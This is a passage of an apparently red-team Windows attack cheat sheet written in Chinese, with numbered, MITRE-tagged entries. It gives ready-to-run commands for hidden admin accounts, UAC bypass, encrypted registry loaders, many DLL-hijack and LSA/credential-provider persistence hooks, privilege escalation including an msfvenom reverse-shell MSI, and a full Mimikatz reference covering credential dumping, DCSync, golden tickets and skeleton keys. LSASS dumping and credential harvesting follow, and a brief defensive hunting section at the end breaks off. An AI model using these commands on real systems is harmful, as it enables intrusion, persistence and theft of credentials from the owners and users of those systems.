## 40. 隐藏用户账户
**TTP:** T1136.001 + T1564.002 | **管理员权限:** ✅ | **APT:** APT33, OilRig, Lazarus Group
```
net user WinlogonService Password123 /add
net localgroup "Administrators" /add WinlogonService
net localgroup "Remote Desktop Users" /add WinlogonService
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v WinlogonService /t REG_DWORD /d 0 /f
# 清理
net user WinlogonService /del
```
## 41. fodhelper UAC 绕过
**TTP:** T1548.002 | **管理员权限:** ❌ | **APT:** APT29, APT41, Turla
```
reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /t REG_SZ /d "{path}" /f
reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f
start C:\Windows\System32\fodhelper.exe
whoami /groups | findstr "High"
# 清理
reg delete "HKCU\Software\Classes\ms-settings" /f
```
## 42. WSL 持久化
**TTP:** T1059.004 | **管理员权限:** ❌ | **APT:** 自定义/红队
```
# bashrc (每个 WSL 终端)
echo "cmd.exe /c C:\\path\\to\\{implant}.exe" >> ~/.bashrc
# cron (重启)
crontab -e
# @reboot cmd.exe /c C:\\path\\to\\{implant}.exe
# profile (登录 shell)
echo "cmd.exe /c C:\\path\\to\\{implant}.exe" >> ~/.profile
```
## 43. DPAPI CurrentUser 注册表加载器
**TTP:** T1027.013 | **管理员权限:** ❌ | **APT:** APT28, APT29, Lazarus Group
```
Add-Type -AssemblyName System.Security
$bytes = [System.Text.Encoding]::UTF8.GetBytes("{path}")
$encrypted = [System.Security.Cryptography.ProtectedData]::Protect($bytes,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
$encBase64 = [Convert]::ToBase64String($encrypted)
reg add "HKCU\Software\Microsoft\WindowsUpdate" /v "CfgData" /t REG_SZ /d $encBase64 /f
# Loader
$encBase64 = (Get-ItemProperty "HKCU:\Software\Microsoft\WindowsUpdate").CfgData
$encBytes = [Convert]::FromBase64String($encBase64)
$decBytes = [System.Security.Cryptography.ProtectedData]::Unprotect($encBytes,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
$implantPath = [System.Text.Encoding]::UTF8.GetString($decBytes)
Start-Process $implantPath
# 清理
reg delete "HKCU\Software\Microsoft\WindowsUpdate" /v CfgData /f
```
## 44. DPAPI 计算机范围
**TTP:** T1027.013 | **管理员权限:** ✅ | **APT:** APT28, APT29
```
Add-Type -AssemblyName System.Security
$bytes = [System.Text.Encoding]::UTF8.GetBytes("{path}")
$encrypted = [System.Security.Cryptography.ProtectedData]::Protect($bytes,$null,[System.Security.Cryptography.DataProtectionScope]::LocalMachine)
$encBase64 = [Convert]::ToBase64String($encrypted)
reg add "HKLM\SOFTWARE\Microsoft\WindowsNT\Cfg" /v "SvcBlob" /t REG_SZ /d $encBase64 /f
# 清理
reg delete "HKLM\SOFTWARE\Microsoft\WindowsNT\Cfg" /f
```
## 45. AES 加密注册表加载器
**TTP:** T1027.013 | **管理员权限:** ❌ | **APT:** Lazarus Group, APT41
```
$key = [System.Security.Cryptography.Aes]::Create()
$key.KeySize = 256; $key.GenerateKey(); $key.GenerateIV()
$plainBytes = [System.Text.Encoding]::UTF8.GetBytes("{path}")
$enc = $key.CreateEncryptor()
$encBytes = $enc.TransformFinalBlock($plainBytes, 0, $plainBytes.Length)
reg add "HKCU\Software\Microsoft\Sync" /v "Payload" /t REG_SZ /d ([Convert]::ToBase64String($encBytes)) /f
reg add "HKCU\Software\Microsoft\Sync" /v "K" /t REG_SZ /d ([Convert]::ToBase64String($key.Key)) /f
reg add "HKCU\Software\Microsoft\Sync" /v "I" /t REG_SZ /d ([Convert]::ToBase64String($key.IV)) /f
# Loader
$payload = [Convert]::FromBase64String((Get-ItemProperty "HKCU:\Software\Microsoft\Sync").Payload)
$K = [Convert]::FromBase64String((Get-ItemProperty "HKCU:\Software\Microsoft\Sync").K)
$I = [Convert]::FromBase64String((Get-ItemProperty "HKCU:\Software\Microsoft\Sync").I)
$aes = [System.Security.Cryptography.Aes]::Create(); $aes.Key = $K; $aes.IV = $I
$dec = $aes.CreateDecryptor()
$decBytes = $dec.TransformFinalBlock($payload, 0, $payload.Length)
Start-Process ([System.Text.Encoding]::UTF8.GetString($decBytes))
# 清理
reg delete "HKCU\Software\Microsoft\Sync" /f
```
## 46. XOR + DPAPI + RunKey (完全组合)
**TTP:** T1027 + T1547.001 | **管理员权限:** ❌ | **APT:** APT28, APT29, Lazarus Group
```
# XOR Obfuscation
function XorBytes($data, $key) {
$out = New-Object byte[] $data.Length
for ($i = 0; $i -lt $data.Length; $i++) { $out[$i] = $data[$i] -bxor $key[$i % $key.Length] }
return $out
}
$path = [System.Text.Encoding]::UTF8.GetBytes("{path}")
$xorKey = [System.Text.Encoding]::UTF8.GetBytes("M4n1k4nd4n")
$xored = XorBytes $path $xorKey
reg add "HKCU\Software\Microsoft\EdgeUpdate" /v "Blob" /t REG_SZ /d ([Convert]::ToBase64String($xored)) /f
reg add "HKCU\Software\Microsoft\EdgeUpdate" /v "K" /t REG_SZ /d "M4n1k4nd4n" /f
# DPAPI + RunKey
$loaderScript = @'
Add-Type -AssemblyName System.Security
$enc = [Convert]::FromBase64String((Get-ItemProperty "HKCU:\Software\Microsoft\Cfg").Data)
$dec = [System.Security.Cryptography.ProtectedData]::Unprotect($enc,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
Start-Process ([System.Text.Encoding]::UTF8.GetString($dec))
'@
$loaderScript | Out-File "C:\ProgramData\loader.ps1" -Encoding UTF8
Add-Type -AssemblyName System.Security
$bytes = [System.Text.Encoding]::UTF8.GetBytes("{path}")
$enc = [System.Security.Cryptography.ProtectedData]::Protect($bytes,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
reg add "HKCU\Software\Microsoft\Cfg" /v "Data" /t REG_SZ /d ([Convert]::ToBase64String($enc)) /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "CfgSvc" /t REG_SZ /d "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\ProgramData\loader.ps1" /f
# 清理
reg delete "HKCU\Software\Microsoft\EdgeUpdate" /f
reg delete "HKCU\Software\Microsoft\Cfg" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v CfgSvc /f
del "C:\ProgramData\loader.ps1"
```
## — 基于 DLL 的持久化技术 —
## 47. AppInit_DLLs
**TTP:** T1546.010 | **管理员权限:** ✅ | **APT:** Turla, APT29
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\lab\payload.dll" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0 /f
:: Cleanup
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 0 /f
```
## 48. COM DLL 劫持 (HKCU 覆盖)
**TTP:** T1546.015 | **管理员权限:** ❌ | **APT:** APT28, Turla, BRONZE BUTLER
```
reg add "HKCU\Software\Classes\CLSID\{BCF2C8F5-9303-4F96-B1F9-37A6E7B77EA4}\InprocServer32" /ve /t REG_SZ /d "C:\lab\payload.dll" /f
reg add "HKCU\Software\Classes\CLSID\{BCF2C8F5-9303-4F96-B1F9-37A6E7B77EA4}\InprocServer32" /v ThreadingModel /t REG_SZ /d "Apartment" /f
:: Cleanup
reg delete "HKCU\Software\Classes\CLSID\{BCF2C8F5-9303-4F96-B1F9-37A6E7B77EA4}" /f
```
## 49. 服务 DLL — svchost.exe
**TTP:** T1543.003 | **管理员权限:** ✅ | **APT:** APT28, Lazarus Group, FIN7, Carbanak
```
reg add "HKLM\SYSTEM\CurrentControlSet\Services\FakeSvc" /v Type /t REG_DWORD /d 32 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\FakeSvc" /v Start /t REG_DWORD /d 2 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\FakeSvc" /v ObjectName /t REG_SZ /d "LocalSystem" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\FakeSvc\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\lab\payload.dll" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v FakeGroup /t REG_MULTI_SZ /d "FakeSvc" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\FakeSvc" /v ImagePath /t REG_EXPAND_SZ /d "%SystemRoot%\System32\svchost.exe -k FakeGroup" /f
sc start FakeSvc
:: Cleanup
sc stop FakeSvc && sc delete FakeSvc
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v FakeGroup /f
```
## 50. Winlogon 通知包 DLL
**TTP:** T1547.004 | **管理员权限:** ✅ | **APT:** APT28, Turla, PLATINUM
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\FakeNotify" /v DllName /t REG_SZ /d "C:\lab\payload.dll" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\FakeNotify" /v Logon /t REG_SZ /d "WinlogonLogonEvent" /f
:: Cleanup
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\FakeNotify" /f
```
## 51. LSA 安全支持提供程序 (SSP) DLL
**TTP:** T1547.005 | **管理员权限:** ✅ | **APT:** Turla, APT28, PLATUM
```
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Security Packages" /t REG_MULTI_SZ /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0payload" /f
copy "C:\lab\payload.dll" "C:\Windows\System32\payload.dll"
:: Restore
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Security Packages" /t REG_MULTI_SZ /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u" /f
```
## 52. rundll32 + RunKey (反射式 DLL)
**TTP:** T1547.001 | **管理员权限:** ❌ | **APT:** FIN7, Carbanak
```
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SyncSvc" /t REG_SZ /d "rundll32.exe C:\lab\payload.dll,EntryPoint" /f
:: Cleanup
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v SyncSvc /f
```
## 53. 计划任务 — rundll32 DLL
**TTP:** T1053.005 | **管理员权限:** ❌ | **APT:** APT41, Lazarus Group
```
schtasks /create /tn "WinSyncDLL" /sc onlogon /tr "rundll32.exe C:\lab\payload.dll,main" /f
schtasks /query /tn "WinSyncDLL" /fo LIST /v
# 清理
schtasks /delete /tn "WinSyncDLL" /f
```
## 54. 幽灵 DLL 劫持
**TTP:** T1574.001 | **管理员权限:** ❌ | **APT:** APT41, Lazarus Group, PowerGhost
```
Copy-Item "C:\lab\payload.dll" "$env:LOCALAPPDATA\Microsoft\WindowsApps\wbemcomn.dll"
Copy-Item "C:\lab\payload.dll" "C:\Git\bin\version.dll"
$env:PATH -split ";"
# 清理
Remove-Item "$env:LOCALAPPDATA\Microsoft\WindowsApps\wbemcomn.dll" -ErrorAction SilentlyContinue
```
## 55. .NET Profiler DLL (COR_PROFILER)
**TTP:** T1574.012 | **管理员权限:** ❌ | **APT:** Lazarus Group, Turla
```
reg add "HKCU\Environment" /v COR_ENABLE_PROFILING /t REG_SZ /d "1" /f
reg add "HKCU\Environment" /v COR_PROFILER /t REG_SZ /d "{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}" /f
reg add "HKCU\Environment" /v COR_PROFILER_PATH /t REG_SZ /d "C:\lab\payload.dll" /f
# 清理
reg delete "HKCU\Environment" /v COR_ENABLE_PROFILING /f
reg delete "HKCU\Environment" /v COR_PROFILER /f
reg delete "HKCU\Environment" /v COR_PROFILER_PATH /f
```
## 56. ETW Provider 劫持 DLL
**TTP:** T1574 | **管理员权限:** ✅ | **APT:** 国家级行为者
```
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{DEADBEEF-0000-0000-0000-000000000001}" /v "MessageFileName" /t REG_EXPAND_SZ /d "C:\lab\payload.dll" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{DEADBEEF-0000-0000-0000-000000000001}" /v "ResourceFileName" /t REG_EXPAND_SZ /d "C:\lab\payload.dll" /f
:: Cleanup
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{DEADBEEF-0000-0000-0000-000000000001}" /f
```
## 57. AMSI Provider DLL
**TTP:** T1562.001 | **管理员权限:** ✅ | **APT:** 国家级行为者
```
$guid = "{CAFEBABE-1337-1337-1337-CAFEBABE1337}"
reg add "HKLM\SOFTWARE\Microsoft\AMSI\Providers\$guid" /ve /t REG_SZ /d "C:\lab\amsi_provider.dll" /f
# 清理
reg delete "HKLM\SOFTWARE\Microsoft\AMSI\Providers\$guid" /f
```
## 58. 打印处理器 DLL
**TTP:** T1547.012 | **管理员权限:** ✅ | **APT:** Lazarus Group, APT28
```
copy "C:\lab\payload.dll" "C:\Windows\System32\spool\prtprocs\x64\evil_proc.dll"
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\EvilProc" /v Driver /t REG_SZ /d "evil_proc.dll" /f
net stop spooler && net start spooler
:: Cleanup
net stop spooler
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\EvilProc" /f
del "C:\Windows\System32\spool\prtprocs\x64\evil_proc.dll"
net start spooler
```
## 59. Winsock LSP DLL
**TTP:** T1574 | **管理员权限:** ❌/✅ | **APT:** 自定义/红队
```
netsh winsock add provider "C:\lab\lsp_payload.dll"
netsh winsock show catalog
netsh winsock remove provider
netsh winsock reset # nuclear
```
## 60. netsh Helper DLL
**TTP:** T1574.001 | **管理员权限:** ✅ | **APT:** 自定义/红队
```
netsh add helper C:\lab\payload.dll
netsh show helper
reg delete "HKLM\SOFTWARE\Microsoft\NetSh" /v /f
```
## 61. WMI Provider DLL
**TTP:** T1546.003 | **管理员权限:** ✅ | **APT:** APT29, Turla
```
reg add "HKLM\SOFTWARE\Classes\CLSID\{AABBCCDD-0000-0000-0000-000000000001}\InprocServer32" /ve /t REG_SZ /d "C:\lab\payload.dll" /f
reg add "HKLM\SOFTWARE\Classes\CLSID\{AABBCCDD-0000-0000-0000-000000000001}\InprocServer32" /v ThreadingModel /t REG_SZ /d "Both" /f
mofcomp.exe C:\lab\evil_provider.mof
# 清理
reg delete "HKLM\SOFTWARE\Classes\CLSID\{AABBCCDD-0000-0000-0000-000000000001}" /f
```
## 62. 网络提供程序 DLL
**TTP:** T1556.008 | **管理员权限:** ✅ | **APT:** APT28, Lazarus Group
```
reg add "HKLM\SYSTEM\CurrentControlSet\Services\EvilNP\NetworkProvider" /v Name /t REG_SZ /d "EvilNP" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\EvilNP\NetworkProvider" /v ProviderPath /t REG_EXPAND_SZ /d "C:\lab\payload.dll" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" /v ProviderOrder /t REG_SZ /d "RDPNP,LanmanWorkstation,webclient,EvilNP" /f
:: Cleanup
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\EvilNP" /f
```
## 63. 密码筛选器 DLL (SAM)
**TTP:** T1556.002 | **管理员权限:** ✅ | **APT:** APT28, Lazarus Group
```
copy "C:\lab\payload.dll" "C:\Windows\System32\passfilt_evil.dll"
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages" /t REG_MULTI_SZ /d "scecli\0passfilt_evil" /f
:: Restore
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages" /t REG_MULTI_SZ /d "scecli" /f
del "C:\Windows\System32\passfilt_evil.dll"
```
## 64. WinRT DLL 激活 (HKCU)
**TTP:** T1574.002 | **管理员权限:** ❌ | **APT:** 自定义/红队
```
$className = "Windows.UI.Notifications.ToastNotificationManager"
reg add "HKCU\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\$className" /v DllPath /t REG_SZ /d "C:\lab\payload.dll" /f
# 清理
reg delete "HKCU\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\$className" /f
```
## 65. 凭据提供程序 DLL
**TTP:** T1547.004 | **管理员权限:** ✅ | **APT:** APT28, Turla
```
copy "C:\lab\payload.dll" "C:\Windows\System32\evil_cp.dll"
reg add "HKLM\SOFTWARE\Classes\CLSID\{EVILCP01-0000-0000-0000-000000000001}\InprocServer32" /ve /t REG_SZ /d "evil_cp.dll" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{EVILCP01-0000-0000-0000-000000000001}" /ve /t REG_SZ /d "EvilCP" /f
:: Cleanup
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{EVILCP01-0000-0000-0000-000000000001}" /f
del "C:\Windows\System32\evil_cp.dll"
```
## 66. Shell 扩展 DLL (右键菜单)
**TTP:** T1574.001 | **管理员权限:** ❌ | **APT:** Turla, APT28
```
$guid = "{SHELLEXT-1337-1337-1337-SHELLEXT13370}"
reg add "HKCU\Software\Classes\*\shellex\ContextMenuHandlers\EvilMenu" /ve /t REG_SZ /d $guid /f
reg add "HKCU\Software\Classes\CLSID\$guid\InprocServer32" /ve /t REG_SZ /d "C:\lab\payload.dll" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved" /v $guid /t REG_SZ /d "EvilShellExt" /f
# 清理
reg delete "HKCU\Software\Classes\*\shellex\ContextMenuHandlers\EvilMenu" /f
reg delete "HKCU\Software\Classes\CLSID\$guid" /f
```
## 67. DiagTrack DLL 劫持
**TTP:** T1574.002 | **管理员权限:** ❌ | **APT:** 自定义/红队
```
Copy-Item "C:\lab\payload.dll" "$env:LOCALAPPDATA\Microsoft\Windows\Diagnostic\DiagPackage.dll"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack" /v ExtensionDll /t REG_SZ /d "$env:LOCALAPPDATA\Microsoft\Windows\Diagnostic\DiagPackage.dll" /f
# 清理
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack" /v ExtensionDll /f
Remove-Item "$env:LOCALAPPDATA\Microsoft\Windows\Diagnostic\DiagPackage.dll"
```
# — 权限提升 —
## 初始侦察
```
whoami /all
whoami /priv
whoami /groups
systeminfo
hostname
net user %username%
net localgroup administrators
```
## 自动化枚举工具
```
# PrivescCheck
Import-Module .\PrivescCheck.ps1
Invoke-PrivescCheck
Invoke-PrivescCheck -Extended
# PowerUp (PowerSploit)
Import-Module .\PowerUp.ps1
Invoke-AllChecks
# SharpUp
.\SharpUp.exe audit
# beRoot
.\beRoot.exe
# Windows Exploit Suggester
systeminfo > sysinfo.txt
python wes.py sysinfo.txt
python wes.py sysinfo.txt --exploits-only
```
## 68. 未加引号的服务路径
**TTP:** T1574.009 | **管理员权限:** ❌→✅ | **APT:** FIN7, APT41
```
# 查找未加引号的服务路径
wmic service get name,pathname,startmode | findstr /i "auto" | findstr /iv "c:\windows" | findstr /iv '"'
# 手动检查
sc qc
# 如果路径 = C:\Program Files\My Service\service.exe (未加引号)
# 将植入程序释放在:C:\Program.exe 或 C:\Program Files\My.exe
copy {path} "C:\Program Files\My.exe"
# 重启服务 / 重启系统
sc stop
sc start
# 清理
del "C:\Program Files\My.exe"
```
## 69. 弱服务二进制文件权限
**TTP:** T1574.010 | **管理员权限:** ❌→✅ | **APT:** FIN7
```
# 查找可写入的服务二进制文件
.\accesschk.exe -uwdqs "Users" "C:\Program Files"
.\accesschk.exe -uwdqs "Everyone" "C:\Program Files"
.\accesschk.exe -uwdqs "Users" "C:\Program Files (x86)"
# 如果可写入:覆盖二进制文件
copy {path} "C:\Program Files\VulnService\service.exe" /y
# 重启
sc stop VulnService && sc start VulnService
# 清理
# 恢复原始二进制文件
```
## 70. 弱服务注册表权限
**TTP:** T1574 | **管理员权限:** ❌→✅ | **APT:** APT28
```
# 检查服务的注册表 ACL
.\accesschk.exe -kwqs "Users" "HKLM\System\CurrentControlSet\Services"
.\accesschk.exe -kwqs "Authenticated Users" "HKLM\System\CurrentControlSet\Services"
# 如果发现可写入的服务注册表键
reg add "HKLM\System\CurrentControlSet\Services\" /v ImagePath /t REG_SZ /d "{path}" /f
sc stop && sc start
```
## 71. AlwaysInstallElevated (MSI)
**TTP:** T1548 | **管理员权限:** ❌→✅ | **APT:** 自定义/红队
```
:: Check if enabled (both must = 1)
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```
```
# 生成 MSI 载荷
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f msi > evil.msi
```
```
:: Execute (installs as SYSTEM)
msiexec /quiet /qn /i evil.msi
```
## 72. Token 模拟 (PrintSpoofer / GodPotato)
**TTP:** T1134 | **管理员权限:** ❌→✅ | **APT:** 自定义/红队
```
# 检查权限
whoami /priv | findstr /i "SeImpersonate SeAssignPrimary SeBackup SeRestore SeTakeOwnership"
# PrintSpoofer (SeImpersonatePrivilege → SYSTEM)
.\PrintSpoofer.exe -i -c cmd
.\PrintSpoofer.exe -c "powershell -nop -w hidden -c {payload}"
# GodPotato
.\GodPotato.exe -cmd "cmd /c whoami"
.\GodPotato.exe -cmd "cmd /c {path}"
# JuicyPotatoNG
.\JuicyPotatoNG.exe -t * -p {path}
```
## 73. SYSTEM 服务中的 DLL 劫持
**TTP:** T1574.001 | **管理员权限:** ❌→✅ | **APT:** APT41, Lazarus Group
```
# 查找加载缺失 DLL 的 SYSTEM 服务
# ProcMon 筛选器:Process Name = .exe | Result = NAME NOT FOUND | Path 以 .dll 结尾
# 查找服务 DLL 搜索路径中的可写目录
.\accesschk.exe -uwdqs "Users" "C:\Program Files\"
# 释放匹配名称的恶意 DLL
copy {path} "C:\Program Files\\missing.dll"
# 重启服务
sc stop && sc start
```
## 74. SeImpersonatePrivilege 滥用
**TTP:** T1134.001 | **管理员权限:** ❌→✅ | **APT:** 自定义/红队
通常适用于:IIS AppPool、SQL Server 服务账户、通过 Web 漏洞获取的 meterpreter Shell。
```
whoami /priv
# 如果 SeImpersonatePrivilege = Enabled
.\PrintSpoofer.exe -i -c "cmd /c whoami"
.\GodPotato.exe -cmd "whoami"
# 验证 SYSTEM
whoami
```
## 75. 存储的凭据滥用
**TTP:** T1555 | **管理员权限:** ❌ | **APT:** APT33, OilRig
```
# 列出存储的凭据
cmdkey /list
C:\Windows\System32\cmdkey.exe /list
# 将存储的凭据与 runas 配合使用
runas /savecred /user:\ "cmd.exe"
runas /savecred /user:Administrator "powershell.exe -nop -w hidden"
# 检查凭据文件
dir /a %USERPROFILE%\AppData\Local\Microsoft\Credentials\
dir /a %USERPROFILE%\AppData\Roaming\Microsoft\Credentials\
```
# — 后渗透 —
## 凭据搜寻
```
# Winlogon 自动登录
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# 注册表中的所有密码字符串
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
# Unattend / Sysprep (明文密码)
dir /b /s C:\Windows\Panther\unattend.xml
dir /b /s C:\Windows\Panther\Unattend\
dir /b /s C:\Windows\System32\Sysprep\sysprep.xml
dir /b /s C:\Windows\System32\Sysprep\sysprep.inf
# 文件系统搜索
dir /s /b *pass* *cred* *vnc* *config* 2>nul
dir /b /s web.config
dir /b /s unattend.xml
# 在文件中进行字符串搜索
findstr /si "password" *.xml *.ini *.txt *.config
findstr /si "secret" *.xml *.ini *.txt
findstr /si "cred" *.xml *.ini *.txt
# 转储所有文件列表
dir C:\ /b /a /s > creds.txt
findstr /i "pass\|secret\|cred" creds.txt
```
## SessionGopher — 会话凭据 harvesting
```
Import-Module .\SessionGopher.ps1
Invoke-SessionGopher # current host
Invoke-SessionGopher -Thorough # deeper sweep
Invoke-SessionGopher -Target # remote host
Invoke-SessionGopher -AllDomain # domain-wide (DA)
```
**收集内容:** PuTTY, WinSCP, FileZilla, RDP, SuperPuTTY 会话凭据。
## LaZagne — 多应用程序密码恢复
```
:: All modules
.\LaZagne.exe all
:: Specific modules
.\LaZagne.exe browsers
.\LaZagne.exe windows
.\LaZagne.exe wifi
.\LaZagne.exe mail
.\LaZagne.exe git
.\LaZagne.exe database
:: Write output
.\LaZagne.exe all -oN
.\LaZagne.exe all -oJ :: JSON
```
**目标:** Chrome, Firefox, Edge, Outlook, FileZilla, PuTTY, WiFi, Windows Vault, Git, SVN.
## psrecon — PowerShell 侦察框架
```
Import-Module .\PSRecon.ps1
Invoke-PSRecon
# 或者直接运行
powershell -ep bypass -f PSRecon.ps1
```
**收集:** 系统信息、用户、组、进程、服务、网络配置、计划任务、已安装软件、浏览器历史记录、剪贴板。
## Mimikatz — 完整命令参考
```
:: Run as admin
mimikatz.exe
:: Enable debug privilege (required first)
privilege::debug
:: Elevate to SYSTEM
token::elevate
:: === CREDENTIAL DUMPING ===
:: Logon passwords (plaintext if WDigest enabled)
sekurlsa::logonpasswords
:: NTLM hashes only
sekurlsa::msv
:: Kerberos tickets
sekurlsa::tickets
:: Kerberos keys
sekurlsa::ekeys
:: Wdigest plaintext
sekurlsa::wdigest
:: SAM dump (local hashes — needs SYSTEM)
lsadump::sam
:: LSA secrets
lsadump::secrets
:: LSA cache (domain cached creds)
lsadump::cache
:: DCSYNC — dump any account (needs DA or replication rights)
lsadump::dcsync /user:Administrator
lsadump::dcsync /user:krbtgt
lsadump::dcsync /domain: /all /csv
:: === ENABLE WDIGEST (plaintext on next login) ===
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
:: === PASS-THE-HASH ===
sekurlsa::pth /user:Administrator /domain:. /ntlm: /run:cmd.exe
sekurlsa::pth /user: /domain: /ntlm: /run:"powershell -nop"
:: === PASS-THE-TICKET ===
kerberos::list
kerberos::list /export
kerberos::ptt ticket.kirbi
:: === GOLDEN TICKET ===
kerberos::golden /user:Administrator /domain: /sid: /krbtgt: /id:500
kerberos::golden /user:Administrator /domain: /sid: /krbtgt: /id:500 /ptt
:: === SILVER TICKET ===
kerberos::golden /user:Administrator /domain: /sid: /target: /service:cifs /rc4: /ptt
:: === SKELETON KEY (domain persistence) ===
misc::skeleton
:: === CREDENTIAL MANAGER ===
vault::cred
vault::list
:: === MINIDUMP LSASS ===
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
```
## LSASS 转储 (无 Mimikatz 落盘)
```
# Task Manager → Processes → lsass.exe → Create Dump File
# 然后在 mimikatz 中加载:sekurlsa::minidump C:\Users\\AppData\Local\Temp\lsass.DMP
# ProcDump (Microsoft 签名)
.\procdump.exe -ma lsass.exe lsass.dmp
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp
# PowerShell (comsvcs.dll)
$id = (Get-Process lsass).Id
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump $id C:\lsass.dmp full
# 在 mimikatz 中加载转储文件
sekurlsa::minidump C:\lsass.dmp
sekurlsa::logonpasswords
```
## 后渗透枚举
```
# === SYSTEM ===
systeminfo
hostname
whoami /all
net user
net localgroup administrators
ipconfig /all
arp -a
netstat -ano
route print
# === PROCESSES ===
tasklist /v
Get-Process | Select Name, Id, Path
# === DOMAIN ===
net user /domain
net group "Domain Admins" /domain
net group "Domain Controllers" /domain
nltest /domain_trusts
# === SHARES ===
net share
net view \\
# === ANTIVIRUS / EDR ===
sc query windefend
Get-MpComputerStatus
tasklist | findstr /i "defender mssense cortana crowdstrike sentinel carbonblack cylance"
# === CLIPBOARD ===
Get-Clipboard
# === RECENT FILES ===
dir "$env:APPDATA\Microsoft\Windows\Recent" /b
# === BROWSER HISTORY ===
# Chrome
dir "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\History"
# Firefox
dir "$env:APPDATA\Mozilla\Firefox\Profiles"
```
## 持久化威胁狩猎速查表
```
# === STARTUP / RUN KEYS ===
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"
Get-CimInstance Win32_StartupCommand | Select Name, Command, Location, User
# === SCHEDULED TASKS ===
Get-ScheduledTask | Where-Object { $_.TaskPath -notlike "\Microsoft*" } | Format-Table TaskName, TaskPath, State
schtasks /query /fo LIST /v | findstr /i "system"
Get-ChildItem "C:\Windows\System32\Tasks\" -Recurse -File | Where-Object { $_.FullName -notlike "*Microsoft*" }
# === WINLOGON ===
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
# === IFEO ===
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /s
# === SERVICES ===
Get-Service | Where-Object {$_.StartType -eq "Automatic"} | Select Name, DisplayName, Status
# === WMI SUBSCRIPTIONS ===
